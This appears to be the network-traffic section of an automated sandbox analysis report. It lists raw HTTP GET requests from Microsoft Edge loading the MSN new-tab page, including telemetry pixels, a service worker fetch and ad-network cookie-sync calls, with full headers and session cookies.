                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257081027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=906330005d7047b1adccdfa6b3e22806&activityId=906330005d7047b1adccdfa6b3e22806&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /b2?rn=1738257081027&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=145825B7BD7A64E20DCF3033BCF06578&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1B2a9603c814aa64121dd681738257082; XID=1B2a9603c814aa64121dd681738257082
                Source: global trafficHTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 7.25sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=1c2acd7c-e63a-498f-9657-1fee0450e1d6; ai_session=EtxE78cLNeGADtnKNG2Dia|1738257081023|1738257081023; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z
                Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":33,"imageId":"BB1msyO5","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; MUIDB=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=1c2acd7c-e63a-498f-9657-1fee0450e1d6; ai_session=EtxE78cLNeGADtnKNG2Dia|1738257081023|1738257081023; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257081027&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=906330005d7047b1adccdfa6b3e22806&activityId=906330005d7047b1adccdfa6b3e22806&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=1FA1E4F4371E43A1B8D6A56A2A450B69&MUID=145825B7BD7A64E20DCF3033BCF06578 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=145825B7BD7A64E20DCF3033BCF06578; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; SM=T; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                Source: global trafficHTTP traffic detected: GET /edge/ntp?&form=MT004B&OCID=MT004B HTTP/1.1Host: ntp.msn.comConnection: keep-alivedevice-memory: 8sec-ch-dpr: 1sec-ch-viewport-width: 1232sec-ch-viewport-height: 910rtt: 200downlink: 10ect: 4gsec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.2045.47"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":33,"imageId":"BB1msyO5","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vp":{"height":876,"width":1232},"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: pglt-edgeChromium-dhp=547; USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; msnup=%7B%22cnex%22%3A%22no%22%7D
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257090593&udc=true&pg.n=default&pg.t=ntp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3F%26form%3DMT004B%26OCID%3DMT004B&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68582199850e45b7ad01a954e30970e7&activityId=68582199850e45b7ad01a954e30970e7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; SM=C; SRM_M=145825B7BD7A64E20DCF3033BCF06578; MR=0; ANONCHK=0; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1738257090593&udc=true&pg.n=default&pg.t=ntp&pg.c=2083&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3F%26form%3DMT004B%26OCID%3DMT004B&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=68582199850e45b7ad01a954e30970e7&activityId=68582199850e45b7ad01a954e30970e7&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&CtsSyncId=8409F82092954CD0B5D89F060BC43C3C&MUID=1CEEFCDF50C667711B38E95B514A66A6 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; SRM_M=145825B7BD7A64E20DCF3033BCF06578; MR=0; ANONCHK=0; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6; SM=T
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=resriver&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=cfb3017e-dde0-4295-9acf-74a966b96ae2&ii=1&c=656232445000136485&bid=094657a1-39df-433d-9d2c-a24746fb158d&tid=edgechrntp-resriver-1&ptid=edgechrntp-resriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":29,"imageId":"BB1msOZa","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vp":{"height":876,"width":1232},"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004BAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: pglt-edgeChromium-dhp=547; _C_Auth=; pglt-edgeChromium-ntp=2083; USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; msnup=%7B%22cnex%22%3A%22no%22%7D; sptmarket=en-gb||us|en-us|en-us|en||cf=8|RefA=68582199850E45B7AD01A954E30970E7.RefC=2025-01-30T17:11:30Z; MUID=1CEEFCDF50C667711B38E95B514A66A6; MUIDB=1CEEFCDF50C667711B38E95B514A66A6; MicrosoftApplicationsTelemetryDeviceId=4e7f250b-0d09-4996-9293-879c31dce511If-None-Match: 0x8DD40A9D9B7D817If-Modified-Since: Wed, 29 Jan 2025 21:14:00 GMT
                Source: global trafficHTTP traffic detected: GET /notify/served?rid=68582199850e45b7ad01a954e30970e7&r=river&i=1&p=edgechrntp&l=en-us&d=bing&b=Edg&a=c6706130-fb7d-447f-8fbe-47810dfa3fd0&ii=1&c=6988144553414921538&bid=094657a1-39df-433d-9d2c-a24746fb158d&tid=edgechrntp-river-1&ptid=edgechrntp-peekriver-1 HTTP/1.1Host: srtb.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; msnup=%7B%22cnex%22%3A%22no%22%7D; _C_ETH=1; MUID=1CEEFCDF50C667711B38E95B514A66A6
                Source: global trafficHTTP traffic detected: GET /sg/msn/1/cm?taboola_hm=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /uidmappixel?ext_uid=1CEEFCDF50C667711B38E95B514A66A6&pname=MSN&gdpr=0&gdpr_consent= HTTP/1.1Host: sync.outbrain.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /edge/ntp?form=MT004B&OCID=MT004B&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":33,"imageId":"BB1msyO5","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vp":{"height":876,"width":1232},"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?&form=MT004B&OCID=MT004BAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: pglt-edgeChromium-dhp=547; _C_Auth=; pglt-edgeChromium-ntp=2083; USRLOC=; _EDGE_S=F=1&SID=2CD498407D8F6E7F07DF8DC47C156F43; _EDGE_V=1; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=906330005D7047B1ADCCDFA6B3E22806.RefC=2025-01-30T17:11:17Z; msnup=%7B%22cnex%22%3A%22no%22%7D; sptmarket=en-gb||us|en-us|en-us|en||cf=8|RefA=68582199850E45B7AD01A954E30970E7.RefC=2025-01-30T17:11:30Z; MUID=1CEEFCDF50C667711B38E95B514A66A6; MUIDB=1CEEFCDF50C667711B38E95B514A66A6; MicrosoftApplicationsTelemetryDeviceId=4e7f250b-0d09-4996-9293-879c31dce511
                Source: global trafficHTTP traffic detected: GET /setuid?partner=microsoftSsp&dbredirect=true&dnt=0&gdpr=0&gdpr_consent= HTTP/1.1Host: px.ads.linkedin.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /cksync.php?type=nms&cs=3&ovsid=1CEEFCDF50C667711B38E95B514A66A6&gdpr=0&gdpr_consent= HTTP/1.1Host: hbx.media.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /m?cdsp=516415&c=1CEEFCDF50C667711B38E95B514A66A6&mode=inverse&msn_src=ntp&&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.mgid.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /sync/msn?gdpr=0&gdpr_consent= HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /mapuid?suid=1CEEFCDF50C667711B38E95B514A66A6&sid=16&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /mapuid?member=280&user=1CEEFCDF50C667711B38E95B514A66A6;&gdpr=0&gdpr_consent=&redir=https%3A%2F%2Fm.adnxs.com%2Fseg%3Fadd%3D5159620%26redir%3Dhttps%253A%252F%252Fib.adnxs.com%252Fsetuid%253Fentity%253D483%2526code%253D1CEEFCDF50C667711B38E95B514A66A6%2526gdpr%253D0%2526gdpr_consent%253D HTTP/1.1Host: m.adnxs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Edge-Shopping-Flag: 1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: 